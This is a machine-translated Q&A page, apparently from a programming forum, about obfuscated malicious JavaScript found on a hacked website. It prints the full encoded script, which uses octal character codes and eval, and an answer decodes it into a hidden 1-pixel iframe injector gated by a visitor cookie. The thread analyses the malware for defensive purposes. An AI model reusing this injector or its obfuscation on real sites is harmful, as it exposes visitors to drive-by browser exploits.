在网站上发现恶意代码,它是做什么的
Malicious code found on website, what does it do?
我在一个网站上发现了这段代码,我被要求帮助,它引起了各种各样的混乱。起初它被重定向到另一个站点,我想是为了尝试传递某种有效载荷。我不知道如何解密这个虽然,我很好奇。有人能给我指个正确的方向吗?
用Google搜索其中的一部分,可以发现相当多的网站似乎都有。
<script type="text/javascript" language="javascript" >
asd=function(){d.body++};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,175,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,175,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,170,147,154,163,164,164,62,167,170,145,166,170,160,163,153,155,147,62,147,163,161,63,147,167,167,63,147,163,171,162,170,151,166,62,164,154,164,53,77,21,16,44,175,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,44,101,44,53,145,146,167,163,160,171,170,151,53,77,21,16,44,175,62,167,170,175,160,151,62,146,163,166,150,151,166,44,101,44,53,64,53,77,21,16,44,175,62,167,170,175,160,151,62,154,151,155,153,154,170,44,101,44,53,65,164,174,53,77,21,16,44,175,62,167,170,175,160,151,62,173,155,150,170,154,44,101,44,53,65,164,174,53,77,21,16,44,175,62,167,170,175,160,151,62,160,151,152,170,44,101,44,53,65,164,174,53,77,21,16,44,175,62,167,170,175,160,151,62,170,163,164,44,101,44,53,65,164,174,53,77,21,16,21,16,44,155,152,44,54,45,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,175,53,55,55,44,177,21,16,44,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,53,100,150,155,172,44,155,150,101,140,53,175,140,53,102,100,63,150,155,172,102,53,55,77,21,16,44,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,175,53,55,62,145,164,164,151,162,150,107,154,155,160,150,54,175,55,77,21,16,44,201,21,16,201,21,16,152,171,162,147,170,155,163,162,44,127,151,170,107,163,163,157,155,151,54,147,163,163,157,155,151,122,145,161,151,60,147,163,163,157,155,151,132,145,160,171,151,60,162,110,145,175,167,60,164,145,170,154,55,44,177,21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,175,167,101,101,162,171,160,160,44,200,200,44,162,110,145,175,167,101,101,64,55,44,162,110,145,175,167,101,65,77,21,16,44,151,174,164,155,166,151,62,167,151,170,130,155,161,151,54,170,163,150,145,175,62,153,151,170,130,155,161,151,54,55,44,57,44,67,72,64,64,64,64,64,56,66,70,56,162,110,145,175,167,55,77,21,16,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,44,101,44,147,163,163,157,155,151,122,145,161,151,57,46,101,46,57,151,167,147,145,164,151,54,147,163,163,157,155,151,132,145,160,171,151,55,21,16,44,57,44,46,77,151,174,164,155,166,151,167,101,46,44,57,44,151,174,164,155,166,151,62,170,163,113,121,130,127,170,166,155,162,153,54,55,44,57,44,54,54,164,145,170,154,55,44,103,44,46,77,44,164,145,170,154,101,46,44,57,44,164,145,170,154,44,76,44,46,46,55,77,21,16,201,21,16,152,171,162,147,170,155,163,162,44,113,151,170,107,163,163,157,155,151,54,44,162,145,161,151,44,55,44,177,21,16,44,172,145,166,44,167,170,145,166,170,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,162,145,161,151,44,57,44,46,101,46,44,55,77,21,16,44,172,145,166,44,160,151,162,44,101,44,167,170,145,166,170,44,57,44,162,145,161,151,62,160,151,162,153,170,154,44,57,44,65,77,21,16,44,155,152,44,54,44,54,44,45,167,170,145,166,170,44,55,44,52,52,21,16,44,54,44,162,145,161,151,44,45,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,64,60,44,162,145,161,151,62,160,151,162,153,170,154,44,55,44,55,44,55,21,16,44,177,21,16,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,201,21,16,44,155,152,44,54,44,167,170,145,166,170,44,101,101,44,61,65,44,55,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,172,145,166,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,46,77,46,60,44,160,151,162,44,55,77,21,16,44,155,152,44,54,44,151,162,150,44,101,101,44,61,65,44,55,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,160,151,162,153,170,154,77,21,16,44,166,151,170,171,166,162,44,171,162,151,167,147,145,164,151,54,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,160,151,162,60,44,151,162,150,44,55,44,55,77,21,16,201,21,16,155,152,44,54,162,145,172,155,153,145,170,163,166,62,147,163,163,157,155,151,111,162,145,146,160,151,150,55,21,16,177,21,16,155,152,54,113,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"["split"](","));ss=String;d=document;for(i=0;i<a.length;i+=1){a[i]=-(7-3)+parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz^=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a));</script><!--/0c0896-->
编辑:我似乎不能张贴整个事情,所以我已经把它粘贴到粘贴箱为那些感兴趣的!http://pastebin.com/w1eH1JkB
经过一些修改,我想出了这个:
var code='';
for(i=0;i<a.length;i++) {
code = code + String.fromCharCode(parseInt(a[i],8)-4);
}
console.log(hax);
解码"a"并输出如下:
function zzzfff() {
var y = document.createElement('iframe');
y.src = 'REDACTED';
y.style.position = 'absolute';
y.style.border = '0';
y.style.height = '1px';
y.style.width = '1px';
y.style.left = '1px';
y.style.top = '1px';
if (!document.getElementById('y')) {
document.write('<div id=''y''></div>');
document.getElementById('y').appendChild(y);
}
}
function SetCookie(cookieName,cookieValue,nDays,path) {
var today = new Date();
var expire = new Date();
if (nDays==null || nDays==0) nDays=1;
expire.setTime(today.getTime() + 3600000*24*nDays);
document.cookie = cookieName+"="+escape(cookieValue)
+ ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) &&
( name != document.cookie.substring( 0, name.length ) ) )
{
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
zzzfff();
}
}
这段代码从另一个站点加载iframe。它看起来只是跟踪访问者,但他们可以在iframe中做任何事情(如尝试浏览器漏洞)。
加密的内容是所谓的" cookie炸弹"攻击,这是最近经常使用的。解密和激活在Jeffrey Sambells的"黑客剖析"中有详细的解释。
找出这种"加密JS-stuff"背后的一个好方法是美化源代码,在eval()
-ed或写入文档之前放一个debugger;
语句,或者用console.log()
替换这些语句并在JavaScript控制台上运行它们。如果它应该在客户端执行,邪恶制造者必须始终包含解码机制。
使用JavaScript、混淆和cookie来避免机器人意识到"感染"。在网上搜索文档。然而,Body ++或函数zzzfff带来了很多结果。
值得注意的是,如果zz
之前的值为2,document.body++
成功或客户端实现错误,thatss.fromCharCode.apply(ss,a)
-解码函数只会被eval
-ed;因此,目标是非常具体的东西(或者这个代码片段的编码器做错了什么)。
- 有什么工具可以轻松读取javascript代码吗
- 我不知道为什么我的代码是错误的?又有什么错
- 这个代码在网页中的作用和要求是什么
- 什么'这个javascript代码getElementById有问题
- 问号在这段代码中是什么意思
- 什么'这是谷歌分析跟踪代码使用的技术
- 我不知道此代码中的这些符号是什么意思.十进制到二进制
- 此nodeValue替换代码有什么问题
- 什么正在取代我的'以及“;javascript代码中使用&#39;和&”;
- 使用较少代码隐藏和显示选择菜单内容的更好方法是什么?javascript
- Javascript Carousel:是什么代码可以显示一些以前的图像
- 我需要添加什么代码,以便此 javascript 自动在文本末尾添加 3 个点
- 我需要什么代码才能让从我的数组中订购的披萨重新出现在不同的函数中
- 这是什么代码/^(d{4}|d{6})$/
- (HTML)链接到一个图像,不确定什么代码关闭图像
- 这是什么代码?{{phrase.addAdministrator}}
- 我应该添加什么代码来使用JavaScript显示以下输出?
- 我需要在这个脚本上编辑什么代码才能获得有效的电子邮件
- 在网站内单击时,将javascript变量(trailimage)交换为另一个需要什么代码
- 如果原型不能访问私有变量,那么“清理”的最佳方法是什么?代码